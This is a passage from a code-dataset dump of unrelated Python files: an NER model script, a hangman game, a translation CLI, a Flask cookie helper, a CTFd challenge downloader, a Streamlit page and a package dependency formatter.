recurrent_dropout=0.2, dropout=0.2))(x)\nx = add([x, x_rnn]) # residual connection to the first biLSTM\nout = TimeDistributed(Dense(n_tags, activation=\"softmax\"))(x)\nmodel = Model(input_text, out)\nmodel.compile(optimizer=\"adam\", loss=\"sparse_categorical_crossentropy\", metrics=[\"accuracy\"])\n\n\nX_tr, X_val = X_tr[:1213*batch_size], X_tr[-135*batch_size:]\ny_tr, y_val = y_tr[:1213*batch_size], y_tr[-135*batch_size:]\ny_tr = 
y_tr.reshape(y_tr.shape[0], y_tr.shape[1], 1)\ny_val = y_val.reshape(y_val.shape[0], y_val.shape[1], 1)\nhistory = model.fit(np.array(X_tr), y_tr, validation_data=(np.array(X_val), y_val),batch_size=batch_size, epochs=3, verbose=1)\n\nfrom seqeval.metrics import precision_score, recall_score, f1_score, classification_report\nX_te = X_te[:149*batch_size]\ntest_pred = model.predict(np.array(X_te), verbose=1)\n\nidx2tag = {i: w for w, i in tags2index.items()}\n\ndef pred2label(pred):\n out = []\n for pred_i in pred:\n out_i = []\n for p in pred_i:\n p_i = np.argmax(p)\n out_i.append(idx2tag[p_i].replace(\"PADword\", \"O\"))\n out.append(out_i)\n return out\ndef test2label(pred):\n out = []\n for pred_i in pred:\n out_i = []\n for p in pred_i:\n out_i.append(idx2tag[p].replace(\"PADword\", \"O\"))\n out.append(out_i)\n return out\n \npred_labels = pred2label(test_pred)\ntest_labels = test2label(y_te[:149*32])\nprint(classification_report(test_labels, pred_labels))\n\ni = 390\np = model.predict(np.array(X_te[i:i+batch_size]))[0]\np = np.argmax(p, axis=-1)\nprint(\"{:15} {:5}: ({})\".format(\"Word\", \"Pred\", \"True\"))\nprint(\"=\"*30)\nfor w, true, pred in zip(X_te[i], y_te[i], p):\n if w != \"__PAD__\":\n print(\"{:15}:{:5} ({})\".format(w, tags[pred], tags[true]))\n \n\n","repo_name":"SyedDanishAhmed/Named-Entity-Recognition","sub_path":"entity-extraction-lstm.py","file_name":"entity-extraction-lstm.py","file_ext":"py","file_size_in_byte":6212,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"75177223496","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndata = np.loadtxt('accelerometer.txt')\nprint(np.shape(data))\n\ntime = np.linspace(0,len(data)*0.1,len(data))\n\ndata20 = data[time<20]\ntime20 = time[time<20]\n\ndata_end = data[time > 52]\ntime_end = time[time > 52]\n\ndata_end2 = data_end[time_end < 63]\ntime_end2 = time_end[time_end < 63]\n\nplt.plot(time,data,label='Full Data Set')\nplt.plot(time20,data20,label='Time < 20 data set')\nplt.plot(time_end2,data_end2,label='Time end data set')\nplt.legend()\nplt.grid()\n\nplt.figure()\nplt.plot(time20,data20,'m-')\nplt.plot(time_end2-time_end2[0],data_end2,'g-')\nplt.grid()\n\nmean20 = np.mean(data20)\nstd20 = np.std(data20)\nprint(mean20,std20)\nmean_end = np.mean(data_end2)\nstd_end = np.std(data_end2)\nprint(mean_end,std_end)\n\nplt.figure()\nplt.hist(data20)\n\nplt.figure()\nplt.hist(data_end2)\n\nplt.show()","repo_name":"cmontalvo251/Python","sub_path":"instrumentation/cpx_assignments/plot_raw_accelerometer.py","file_name":"plot_raw_accelerometer.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"45"} +{"seq_id":"6298910595","text":"#TIE-02100\r\n#13.2 Graafisen käyttöliittymän suunnitteleminen ja toteuttaminen\r\n#Henri Pulkkinen\r\n#oppnro \r\n#huhtikuu 2017\r\n\r\n#Hirsipuupeli. Käyttäjä syöttää kirjaimia entry-kenttään\r\n#tai arvaa koko sanan/lauseen. Vääriä arvauksia sallitaan 9.\r\n#Väärästä arvauksesta ilmoitetaaan käyttäjälle tekstin lisäksi\r\n#käyttöliittymän alalaidan asteikolla, missä punaisten ruutujen\r\n#määrä indikoi väärin menneiden yritysten lukumäärää. Alussa\r\n#kaikki ruudut ovat valkoisia. 
Kymmenen väärän arvauksen\r\n#jälkeen peli on hävitty.\r\n#Uuden pelin voi aloittaa milloin vain New game-nappulalla,\r\n#jolloin myös arvotaaan uusi sana listasta.\r\n#Uusia sanoja/lauseita on helppo lisätä peliin; riittää kun ne\r\n#lisätään SANAT-listaan.\r\n#Jos käyttäjä arvaa kaikki oikeat kirjaimet tai arvaa oikein koko\r\n#sanan/lauseen, käyttäjä voittaa pelin ja siitä ilmoitetaan\r\n#tekstillä. Lisäksi kaikki alalaidan ruudut muuttuvat vihreiksi.\r\n#Mikäli käyttäjä syöttää yhden merkin, joka on jotain muuta kuin\r\n#kirjain, ruutuun tulee teksti \"Invalid input\", eikä käyttäjä\r\n#saa rangaistusta (alalaidan ruutujen tilanne ei muutu. Yli yhden\r\n#merkin yritykset tulkitaan ratkaisuyrityksiksi, ja väärästä\r\n#vastauksesta rangaistaan kuten väärän kirjaimen syöttämisestäkin.\r\n#\r\n#Työssä tähdättiin yksinkertaiseen toteutukseen, mutta mukaan tuli\r\n#lopulta monia skaalautuvan version piirteitä.\r\n\r\n\r\n\r\nfrom tkinter import *\r\nimport random\r\n\r\n#MERKIT-listasta saadaan kirjainten, sekä välilyönnin ja tyhjän ruudun\r\n#tiedostonimet.\r\nMERKIT = { \"A.gif\", \"B.gif\",\"c.gif\", \"d.gif\" ,\"e.gif\", \"F.gif\"\r\n ,\"G.gif\", \"h.gif\" ,\"I.gif\", \"j.gif\" ,\"k.gif\", \"l.gif\"\r\n ,\"m.gif\", \"n.gif\" ,\"o.gif\", \"p.gif\" ,\"q.gif\", \"r.gif\"\r\n ,\"s.gif\", \"t.gif\" ,\"u.gif\", \"w.gif\" ,\"v.gif\", \"x.gif\"\r\n ,\"y.gif\", \"z.gif\", \"aa.gif\", \"ae.gif\", \"oe.gif\", \"valI.gif\"\r\n ,\"tyhja.gif\"}\r\n\r\n#VÄRIT-listasta saadaan alalaidan väriruutujen tiedostot.\r\nVÄRIT= {\"valkee.gif\",\"punane.gif\",\"vihree.gif\"}\r\n\r\n\r\n#SANAT-lista sisältää pelissä arvattavat sanat. Pitkiä\r\n#lauseita voi rivittää /-merkillä. Käytössä ovat merkit A-Ö.\r\nSANAT=[\"JOHDATUS/OHJELMOINTIIN\",\"KALEVAN/PALLO\",\r\n \"KAHVIGALLUP\",\"GRAAFISEN/KÄYTTÖLIITTYMÄN/SUUNNITTELEMINEN\"\r\n \"/JA TOTEUTTAMINEN\",\"PEKKA SARAVO\",\"PUFF THE MAGIC DRAGON\"\r\n ,\"YESTERDAY ALL/MY TROUBLES SEEMED/SO FAR AWAY\",\r\n \"VIHREÄN JOEN/RANNALLA\", \"YÖ KUIN SIELU/TEEKKARIN ON PIMIÄ\"\r\n ,\"HELMIPÖLLÖ ON/SUOMEN YLEISIN/PÖLLÖLAJI\"]\r\n\r\nclass peli:\r\n def __init__(self):\r\n self.__window = Tk()\r\n self.__window.title(\"Hangman\")\r\n\r\n self.__merkit = {}\r\n # Lisätään kuvatiedostot dictiin.\r\n for picfile in MERKIT:\r\n pic = PhotoImage(file=picfile)\r\n avain=picfile.strip(\".gif\").upper()\r\n self.__merkit[avain]=pic\r\n self.__merkit[\"Ö\"]=PhotoImage(file=\"oe.gif\")\r\n self.__merkit[\"Ä\"]=PhotoImage(file=\"ae.gif\")\r\n self.__merkit[\"Å\"]=PhotoImage(file=\"aa.gif\")\r\n\r\n\r\n self.__asteikkopics={}\r\n #Lisätään väriruudut omaan dictiinsä.\r\n for picfile in VÄRIT:\r\n pic = PhotoImage(file=picfile)\r\n avain=picfile.strip(\".gif\")\r\n self.__asteikkopics[avain]=pic\r\n\r\n self.initialize_game()\r\n\r\n def initialize_game(self):\r\n sanan_numero=random.randint(0,(len(SANAT)-1))\r\n self.__sana=SANAT[sanan_numero]\r\n self.__merkkilabels = []\r\n self.__asteikko=[]\r\n\r\n # Luodaan labelit arvotun sanan kirjaimille/merkeille.\r\n # /-merkin kohdalla vaihdetaan uudelle riville.\r\n sarake=1\r\n rivi=0\r\n for i in range(len(self.__sana)):\r\n if self.__sana[i]==\"/\":\r\n rivi+=1\r\n sarake=0\r\n new_label = Label(self.__window)\r\n new_label.grid(row=0+rivi, column=3+sarake,sticky=E)\r\n self.__merkkilabels.append(new_label)\r\n sarake+=1\r\n\r\n\r\n i=0\r\n #Luodaan labelit alalaidan asteikolle.\r\n for x in range (10):\r\n new_label = Label(self.__window,\r\n image=self.__asteikkopics[\"valkee\"])\r\n new_label.grid(row=5, column=4+i)\r\n 
self.__asteikko.append(new_label)\r\n i+=1\r\n\r\n\r\n indeksi = 0\r\n self.__asetetut_merkit=0\r\n #Lisätään labeleihin kuvatiedostot. Välilyönnit ovat\r\n #harmaita ruutuja ja vielä arvaamattomien kirjainten\r\n #paikalla on tyhjät valkoiset ruudut.\r\n #self.__asetetut_merkit-lukua tarvitaan, kun tarkastetaaan\r\n #onko kaikki kirjaimet arvattu oikein.\r\n for label in self.__merkkilabels:\r\n if self.__sana[indeksi] is not \"/\":\r\n if self.__sana[indeksi]==\" \":\r\n label.configure(image=self.__merkit[\"VALI\"])\r\n self.__asetetut_merkit+=1\r\n else:\r\n label.configure(image=self.__merkit[\"TYHJA\"])\r\n else: self.__asetetut_merkit+=1\r\n indeksi+=1\r\n\r\n self.__arvatut=[]\r\n self.__väärien_määrä=0\r\n\r\n\r\n self.__kirjain = Entry(self.__window)\r\n self.__kirjain.grid(row=3,column=1)\r\n self.__explanationtext = Label(self.__window,\r\n text=\"Start by entering a letter\")\r\n self.__explanationtext.grid(row=2,column=1)\r\n Button(self.__window, text=\"new game\", command=self.new_game)\\\r\n .grid(row=6, column=1, sticky=E)\r\n Button(self.__window, text=\"stop\", command=self.__window.destroy)\\\r\n .grid(row=6, column=2)\r\n\r\n self.__quessButton = Button(self.__window,\r\n text=\"Quess\",command=self.enter)\r\n self.__quessButton.grid(row=4, column=1, sticky=W+E)\r\n\r\n\r\n\r\n\r\n def enter(self):\r\n '''\r\n Tarkastaa syötteen laadun, eli onko syöte kirjain, koko lause vai\r\n \"kielletty\"-merkki. Mikäli kyseessä on virheellinen merkki\r\n tulostetaan virheilmoitus. Mikäli kyseessä yli yhden merkin mittainen\r\n merkkijono, tulkitaan käyttäjän yrittävän ratkaista koko sanaa/lausetta,\r\n jolloin kutsutaan koko_lause funktiota. Mikäli kyseessä on hyväksyttävissä\r\n oleva merkki, tarkastetaan ettei sitä ole jo arvattu. Tämän jälkeen\r\n kutsutaan joko väärin- tai oikea_kirjain-funktiota sen mukaan\r\n löytyykö kirjain kysytystä arvoituksesta.\r\n :return: \r\n '''\r\n kirjain = self.__kirjain.get().upper()\r\n if kirjain !=\"\":\r\n if len(kirjain)==1:\r\n if kirjain.isalpha()==False:\r\n self.__explanationtext.configure(text=\"Invalid input\")\r\n else:\r\n if kirjain not in self.__arvatut:\r\n if kirjain not in self.__sana:\r\n self.väärin(kirjain)\r\n else:\r\n self.oikea_kirjain(kirjain)\r\n self.__arvatut.append(kirjain)\r\n else:\r\n self.__explanationtext.configure\\\r\n (text=\"You have already entered this letter\")\r\n else:\r\n self.koko_lause(kirjain)\r\n self.__kirjain.delete(0,END)\r\n self.tarkasta_lopetus()\r\n\r\n\r\n\r\n def oikea_kirjain(self,kirjain):\r\n '''\r\n Kun käyttäjä syöttää oikean kirjaimen, tämä metodi asettaa\r\n sen/ne näkyviin ruudulle.\r\n :param kirjain: arvattu kirjain\r\n :return:\r\n '''\r\n index=0\r\n avain=kirjain\r\n for kirjaimet in self.__sana:\r\n if kirjaimet==kirjain:\r\n self.__merkkilabels[index].configure(image=self.__merkit[avain])\r\n self.__asetetut_merkit += 1\r\n index+=1\r\n self.__explanationtext.configure(text=\"Correct!\")\r\n\r\n\r\n def väärin(self,kirjain):\r\n '''\r\n Kun käyttäjä arvaa väärin, tämä metodi suorittaa\r\n vaadittavat toimenpiteet. 
Ikkunan alareunan ruudut\r\n muuttuvat punaisiksi, seliteteksti(explanationtext)\r\n\t päivittyy ja käyttäjän mahdollinen häviö tarkistetaan.\r\n :param kirjain:\r\n :return:\r\n '''\r\n self.__arvatut.append(kirjain)\r\n self.__asteikko[self.__väärien_määrä].configure\\\r\n (image=self.__asteikkopics[\"punane\"])\r\n self.__väärien_määrä += 1\r\n self.__explanationtext.configure(text=\"Wrong!\")\r\n if self.__väärien_määrä>len(self.__sana):\r\n self.__explanationtext.configure(text=\"You lose!\")\r\n\r\n def koko_lause(self,mjono):\r\n '''\r\n Jos käyttäjä syöttää yli yhden merkin mittaisen arvauksen,\r\n tämä metodi tarkastaa, vastaako arvaus kysyttyä sanaa tai lausetta.\r\n :param mjono: käyttäjän syöttämä merkkijono\r\n :return: \r\n '''\r\n vertailusana=\"\"\r\n for kirjain in self.__sana:\r\n if kirjain is not \"/\":\r\n if kirjain is not \" \":\r\n vertailusana+=kirjain\r\n syötetty_sana=\"\"\r\n for kirjain in mjono:\r\n if kirjain is not \" \":\r\n syötetty_sana+=kirjain\r\n if syötetty_sana.upper()==vertailusana.upper():\r\n self.oikein()\r\n else:\r\n self.väärin(mjono)\r\n\r\n def ruudukon_täyttö(self):\r\n '''\r\n Käyttäjän arvatessa koko sanan oikein\r\n tämä metodi asettaa koko ko. sanan näkyviin ruudulle.\r\n :return: \r\n '''\r\n indeksi=0\r\n for label in self.__merkkilabels:\r\n kuva=str(self.__sana[indeksi])\r\n if self.__sana[indeksi] is not \"/\":\r\n if self.__sana[indeksi]==(\" \"):\r\n kuva=\"VALI\"\r\n label.configure(image=self.__merkit[kuva])\r\n indeksi+=1\r\n\r\n\r\n def oikein(self):\r\n '''\r\n Käyttäjän arvatessa koko sanan oikein, tämä\r\n metodi suorittaa tarvittavat toimenpiteet sen\r\n ilmoittamiseen. Kysytyt kirjaimet ja onnitteluteksti\r\n ilmestyvät ruudulle. Alalaidan merkit muuttuvat vihreiksi.\r\n :return: \r\n '''\r\n self.ruudukon_täyttö()\r\n self.__explanationtext.configure(text=\"Congratulations! 
\"\r\n \"You won!\")\r\n self.__quessButton.configure(state=\"disabled\")\r\n for label in self.__asteikko:\r\n label.configure(image=self.__asteikkopics[\"vihree\"])\r\n\r\n\r\n\r\n def tarkasta_lopetus(self):\r\n '''\r\n Tarkastaa, onko käyttäjä ratkaissut tehtävän\r\n arvaamalla kaikki kirjaimet oikein, tai onko\r\n sallittu väärien arvausten määrä ylitetty.\r\n :return: \r\n '''\r\n if self.__asetetut_merkit==len(self.__sana):\r\n self.oikein()\r\n if self.__väärien_määrä==10:\r\n self.__explanationtext.configure(text=\"You lost!\")\r\n self.ruudukon_täyttö()\r\n self.__quessButton.configure(state=\"disabled\")\r\n\r\n def new_game(self):\r\n '''\r\n Nollaa pelin ja aloittaa uuden.\r\n :return: \r\n '''\r\n for labels in self.__merkkilabels:\r\n labels.destroy()\r\n self.__explanationtext.configure(text=\"\")\r\n self.initialize_game()\r\n\r\n\r\n def start(self):\r\n self.__window.mainloop()\r\n\r\n\r\ndef main():\r\n peli().start()\r\nmain()\r\n","repo_name":"pulkkinho/hangman","sub_path":"hirsipuu.py","file_name":"hirsipuu.py","file_ext":"py","file_size_in_byte":11513,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"72650804935","text":"import re\nimport ast\nfrom setuptools import setup\n\n\n_version_re = re.compile(r'__version__\\s+=\\s+(.*)')\n\n\nwith open('pytrans/__init__.py', 'rb') as f:\n version = str(ast.literal_eval(_version_re.search(\n f.read().decode('utf-8')).group(1)))\n\n\nsetup(\n name='pytrans',\n author='luw2007',\n author_email='luw20007@gmail.com',\n version=version,\n url='http://github.com/luw2007/python-translate-cli',\n license='The MIT License',\n packages=['pytrans'],\n description='use Google Translate to query word, like soimort/translate-shell.'\n 'But verbose about Definitions, Synonyms, Example.',\n classifiers=[\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: MacOS',\n 'Operating System :: POSIX :: Linux',\n 'Operating System :: Microsoft :: Windows',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n ],\n install_requires=[\n 'click',\n ],\n entry_points='''\n [console_scripts]\n pytrans=pytrans:cli\n ''',\n\n)\n","repo_name":"luw2007/python-translate-cli","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"45"} +{"seq_id":"31936894323","text":"from FileManagement.FileManager import *\nfrom TranslationModel.TranslationModel import *\nfrom TranslationConsoleConfiguration import *\nimport re\nimport os\nfrom functools import reduce\n\n\nclass TranslateConsole:\n programFilePath = 'program.json'\n\n def __init__(self):\n self.__setProgramFile()\n self.fileManager = FileManager()\n today_logs = self.fileManager.read_log_with_date(self.logFilePath)\n self.count = reduce(lambda x, y: x + int(y[2]), today_logs, 0)\n self.translationModel = TranslationModel(self.envFilePath)\n self.translatedText = ''\n\n def __setProgramFile(self):\n with open(self.programFilePath, 'r') as f:\n programFile = json.load(f)\n if programFile['env'] is None or programFile['log'] is None:\n raise Exception(\"The program file is wrong.\")\n if not os.path.isfile(programFile['env']):\n raise Exception(\"env file path is wrong.\")\n if not os.path.isfile(programFile['env']):\n raise Exception(\"Log file path is wrong.\")\n self.max_count = 10000 if 
programFile['max'] is None else int(programFile['max'])\n self.envFilePath = programFile['env']\n self.logFilePath = programFile['log']\n\n def __file_tree(self, option=False):\n return TranslationConsoleConfiguration.show_tree(self.fileManager.root.show_tree(option=option), option=option)\n\n def __status(self):\n return TranslationConsoleConfiguration.show_status(self.fileManager.select,\n self.translationModel.source,\n self.translationModel.target,\n self.count,\n self.max_count)\n\n def select(self, path):\n self.fileManager.selectFilePath(path)\n\n def translate(self, show=True):\n text = self.fileManager.load()\n translateText = ''\n size = len(text)\n translated_text_count = 0\n if show:\n print()\n self.printProgressBar(0, size, length=50)\n for (idx, (state, line)) in enumerate(text):\n if state:\n translateText += self.translationModel.translate(line)\n # translateText += line # testing\n translated_text_count += len(line)\n else:\n translateText += line\n if show:\n self.printProgressBar(idx + 1, size, length=50)\n self.fileManager.logging(self.logFilePath, translated_text_count)\n self.translateText = translateText\n\n def save(self, path):\n self.fileManager.save(path, self.translateText)\n\n def __c_select(self, path, hp=False):\n if hp:\n print(TranslationConsoleConfiguration.select_help)\n return\n if path is None:\n print(TranslationConsoleConfiguration.Error.the_number_of_argument_does_not_match.message())\n else:\n if os.path.isfile(path):\n self.select(path)\n else:\n print(TranslationConsoleConfiguration.Error.file_does_not_exist.message())\n\n def __c_translate(self, hp=False):\n if hp:\n print(TranslationConsoleConfiguration.translate_help)\n return\n if self.fileManager.select is None:\n print(TranslationConsoleConfiguration.Error.must_select_a_file.message())\n else:\n self.translate()\n\n def __c_save(self, path, hp=False):\n if hp:\n print(TranslationConsoleConfiguration.save_help)\n return\n if self.fileManager.select is None:\n print(TranslationConsoleConfiguration.Error.must_select_a_file.message())\n else:\n self.save(path)\n\n def __c_show(self, option, hp=False):\n if hp:\n print(TranslationConsoleConfiguration.show_help)\n return\n al = option in ['-al']\n print(self.__file_tree(al))\n\n def __c_help(self):\n print(TranslationConsoleConfiguration.help)\n\n def __c_set_target(self, lang_code, hp=False):\n if hp:\n print(TranslationConsoleConfiguration.setTarget_help)\n return\n if lang_code is None:\n print(TranslationConsoleConfiguration.Error.the_number_of_argument_does_not_match.message())\n elif lang_code not in TranslationConsoleConfiguration.support_language.values():\n print(TranslationConsoleConfiguration.Error.unsupported_language.message())\n else:\n self.translationModel.setTarget(lang_code)\n\n def __c_set_source(self, lang_code, hp=False):\n if hp:\n print(TranslationConsoleConfiguration.setSource_help)\n return\n if lang_code is None:\n print(TranslationConsoleConfiguration.Error.the_number_of_argument_does_not_match.message())\n elif lang_code not in TranslationConsoleConfiguration.support_language.values():\n print(TranslationConsoleConfiguration.Error.unsupported_language.message())\n print(TranslationConsoleConfiguration.support_language_description)\n else:\n self.translationModel.setSource(lang_code)\n\n def __c_status(self, hp=False):\n if hp:\n print(TranslationConsoleConfiguration.status_help)\n return\n print(self.__status())\n\n def __c_invalid_command(self):\n 
print(TranslationConsoleConfiguration.Error.invalid_command.message())\n print(TranslationConsoleConfiguration.help)\n\n def __c_quick_translate(self, path, path2, hp=False):\n if hp:\n print(TranslationConsoleConfiguration.quick_translate_help)\n return\n self.__c_select(path)\n if path is None: return\n self.__c_translate()\n self.__c_save(path2)\n\n\n \"\"\"\n ================================================================\n \n Facade Pattern\n 사용자에게 간단한 인터페이스 제공\n \n ================================================================\n \"\"\"\n def console(self):\n print(TranslationConsoleConfiguration.description + '\\n')\n while True:\n selectFile = self.fileManager.select\n input_desc = \" ► command: \" if selectFile is None else f\" ► ({selectFile.name}) command: \"\n command = list(map(lambda x: x.lower(), re.sub(r' +', ' ', input(input_desc).strip()).split()))\n for i in range(3 - len(command)):\n command.append(None)\n hp = command[1] in ['-h', '-help']\n if command[0] in ['select', 's']:\n self.__c_select(command[1], hp=hp)\n elif command[0] in ['translate', 't']:\n self.__c_translate(hp=hp)\n elif command[0] in ['save', 'sv']:\n self.__c_save(command[1], hp=hp)\n elif command[0] in ['quicktranslate', 'qt']:\n self.__c_quick_translate(command[1], command[2], hp=hp)\n elif command[0] in ['show', 'sh']:\n self.__c_show(command[1], hp=hp)\n elif command[0] in ['settarget', 'st']:\n self.__c_set_target(command[1], hp=hp)\n elif command[0] in ['setsource', 'sc']:\n self.__c_set_source(command[1], hp=hp)\n elif command[0] in ['status', 'stat']:\n self.__c_status(hp=hp)\n elif command[0] in ['help', 'h']:\n self.__c_help()\n elif command[0] in ['close', 'c']:\n break\n else:\n self.__c_invalid_command()\n\n @staticmethod\n def printProgressBar(idx, total, length=100):\n percent = \"{0:.1f}\".format(100 * (idx / float(total)))\n filledLength = int(length * idx // total)\n bar = '█' * filledLength + '-' * (length - filledLength)\n print(f'\\rtranslate |{bar}| {percent}% complete', end=\"\\r\")\n if idx == total:\n print('\\n')\n\n\nTranslateConsole().console()\n","repo_name":"subJeonhui/DocumentTranslation","sub_path":"TranslationConsole.py","file_name":"TranslationConsole.py","file_ext":"py","file_size_in_byte":8074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"72800490056","text":"from flask import make_response\nimport os\n\n\nclass CookieManager:\n @staticmethod\n def extract_cookie_from_response(response):\n cookies = response.headers.getlist('Set-Cookie')\n cookie_mapper = {}\n for cookie in cookies:\n splitted = cookie.split(';', 1)\n cookie_key, value = splitted[0].split('=')\n other_options = splitted[1]\n cookie_mapper[cookie_key] = value, other_options\n\n return cookie_mapper\n\n @staticmethod\n def add_cookie_to_response(response_data,\n status_code=200,\n **cookie_kwargs):\n resp = make_response(response_data)\n resp.status_code = status_code\n secured = os.getenv('FLASK_ENV') == 'production'\n for key, value in cookie_kwargs.items():\n resp.set_cookie(key,\n value,\n path='/',\n httponly=True,\n secure=secured)\n\n return resp\n\n def decode_cookie(self, cookie):\n pass\n","repo_name":"chidioguejiofor/flask_boilerplate","sub_path":"api/utils/cookie_manager.py","file_name":"cookie_manager.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"17061113561","text":"from helpers import APISession, urljoin\nfrom 
pathlib import Path\nimport requests\nimport string\nimport re\nimport sys\nimport json\nimport argparse\n\n\ndef download(url: str, filepath: Path, chunk_size:int=8192):\n JUMP_LEFT_SEQ = '\\u001b[100D'\n filesize_dl = 0\n try:\n resp = requests.get(url, stream=True)\n filesize = int(resp.headers['Content-Length'])\n print(f\"{filepath.name} - {filesize} bytes\")\n with open(filepath, \"wb\") as handle:\n for chunk in resp.iter_content(chunk_size=chunk_size):\n if chunk: # filter out keep-alive new chunks\n handle.write(chunk)\n filesize_dl = filesize_dl + chunk_size\n print(JUMP_LEFT_SEQ, end='')\n print(f'\\r{filepath.name}: {filesize_dl*100/filesize:.2f}%', end='',flush=True)\n print()\n except Exception as e:\n print(e, file=sys.stderr)\n return\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n ap = argparse.ArgumentParser()\n ap.add_argument('--url', '-u', type=str, help='CTFd URL', required=True)\n ap.add_argument('--token', '-t', type=str, help=\"Your CTFd personal auth token\", required=True)\n ap.add_argument('--output', '-o', type=str, help=\"Destination folder\", default='dump')\n args = ap.parse_args()\n out_path = Path(args.output)\n ctfd = args.url\n s = APISession(prefix_url=ctfd)\n s.headers.update({\"Content-Type\": \"application/json\",\"Authorization\": f\"Token {args.token}\"})\n\n j_challenges = s.get('/api/v1/challenges').json()\n if j_challenges['success'] == True:\n for ch in j_challenges['data']:\n ch['name'] = re.sub(f'[{string.punctuation}]', '_', ch['name'])\n ch['category'] = re.sub(f'[{string.punctuation}]', '_', ch['category'])\n ch_path = (out_path / ch['category'].strip() / ch['name'].strip())\n\n ch_path.mkdir(parents=True, exist_ok=True)\n print(str(ch_path))\n ch = s.get(f'/api/v1/challenges/{ch[\"id\"]}').json()\n\n if ch['success'] == True:\n ch = ch['data']\n with open(str((ch_path / 'Description.md').absolute()),'w', encoding='utf-8') as f:\n f.write(f\"{ch['description']} \\n\")\n if len(ch['hints']):\n f.write(\"\\n**Hints** \\n\")\n for hint in ch['hints']:\n if 'content' in hint:\n f.write(f\"```\\n{hint['content']}\\n``` \\n\")\n if len(ch['files']):\n f.write(\"\\n**Files** \\n\")\n with open(str((ch_path / 'files.txt').absolute()),'w', encoding='utf-8') as filelist:\n for file in ch['files']:\n filename = file.split('/')[-1].split('?')[0]\n url = urljoin(s.prefix_url, file)\n download(url, ch_path / filename)\n f.write(f\"[{filename}]({url}) \\n\")\n filelist.write(f\"{url}\\n\")\n\n json.dump(ch, open(str((ch_path / 'rawdata.json').absolute()), 'w'))\n\n\n","repo_name":"leitosama/ctfd_collector","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"30419476020","text":"\"\"\"\nScript to create a figure from uploaded dataset\n\"\"\"\n\n# imports\nimport streamlit as st\nimport Ref\nimport pandas as pd\nimport altair as alt\nimport numpy as np\nimport plotly.figure_factory as ff\n\nRef.page_config()\n\n\nst.title(\"Data Explorer\")\n\nuser_file = st.file_uploader(\"Upload CSV\")\nst.divider()\n\nif user_file:\n print(\"success\")\nelse:\n x = np.array(range(0, 10))\n y1 = x*2\n y2 = x*3\n\n df = pd.DataFrame({'x': x, 'y1': y1, 'y2':y2})\n c = alt.Chart(df).mark_circle().encode(\n x='x', y='y1')\n st.altair_chart(c, 
use_container_width=True)\n","repo_name":"greyliedtke/WikiPy","sub_path":"pages/DataExplore.py","file_name":"DataExplore.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"4637405195","text":"#!/usr/bin/env python3\n# SPDX-License-Identifier: GPL-3.0-only\n\n\ndef format_deplist(pkgs: str, deptype: str) -> str:\n \"\"\" take a white-space delimited string of pkgs and a deptype\n\n it wraps them with a width of 80 by default, but takes care\n to not break $(vopt_if) blocks in half.\n\n actions done for the symbols given:\n 1. create 'pkgstr' that is pkgs with deptype and formatting for XBPS\n dependency template\n 2. replace 'zzopt' with '$(vopt_if'\n 3. replace '>' with ')'\n 4. replace '|' with ' '\n 5. wrap the text to 80 chars, no long_words or hyphen_breaks\n also add ' ' as a subsequent_indent\n 6. use wrap.fill to return a single multi-line string\n 7. replace '/' with ' '\n 8. return the string\n \"\"\"\n\n from textwrap import TextWrapper\n\n pkgstr: str = deptype + '=\"' + pkgs.replace('zzopt', '$(vopt_if') + '\"'\n\n \"\"\" Before formatting the string we replace > with ) to match the\n $(vopt_if and we also replace | with whitespace so that text\n formatting can separate it into a an whitespace, which is allowed\n since we put the dependencies inside a ' ' block \"\"\"\n pkgstr = pkgstr.replace('>', ')')\n pkgstr = pkgstr.replace('|', ' ')\n\n text_wrapper = TextWrapper(width=80,\n break_long_words=False,\n break_on_hyphens=False,\n subsequent_indent=' ',)\n\n pkgstr = text_wrapper.fill(pkgstr)\n\n \"\"\" / must be replaced with a space after the string is Formatted because\n it can't be separated into a newspace, only the dependencies inside the\n same group marked by the | char \"\"\"\n pkgstr = pkgstr.replace('/', ' ')\n\n return pkgstr\n\n\ndef main():\n from argparse import ArgumentParser\n from subprocess import run, PIPE\n from os.path import isfile\n from re import sub, MULTILINE\n\n canbedeps = [\"hostmakedepends\", \"makedepends\", \"depends\", \"checkdepends\"]\n\n p = ArgumentParser(description=\"trim dependencies of templates.\")\n p.add_argument('pkgname', metavar='template', type=str,\n help='name of the package to be trimmed')\n p.add_argument('--deps', dest='deptypes', nargs='+',\n help='single white-space separated string of deptypes')\n p.add_argument('pkgs', type=str,\n help='single white-space separated string of packages')\n p.add_argument('-i', dest='replace', action='store_true', default=False,\n help='replace dependencies in template')\n\n args = p.parse_args()\n\n \"\"\"\n Create a path by taking the output of xdistdir and adding srcpkgs/\n the pkgname and /template to the end\n \"\"\"\n filepath = 'srcpkgs/' + args.pkgname + '/template'\n xdistdir = run('xdistdir', stdout=PIPE)\n filepath = xdistdir.stdout.decode('utf-8').replace('\\n', '/') + filepath\n\n if not isfile(filepath):\n print('invalid path: ' + filepath)\n exit(2)\n\n \"\"\" packages recieved might be broken into multiple lines, we do our own\n text formatting on format_deplist\n \"\"\"\n pkgs: str = args.pkgs.replace('\\n', ' ')\n\n \"\"\" we might have multiple deptypes separated by white-space\n we will iterate over each one of them separately as they\n are independented of one another\n \"\"\"\n for deptype in 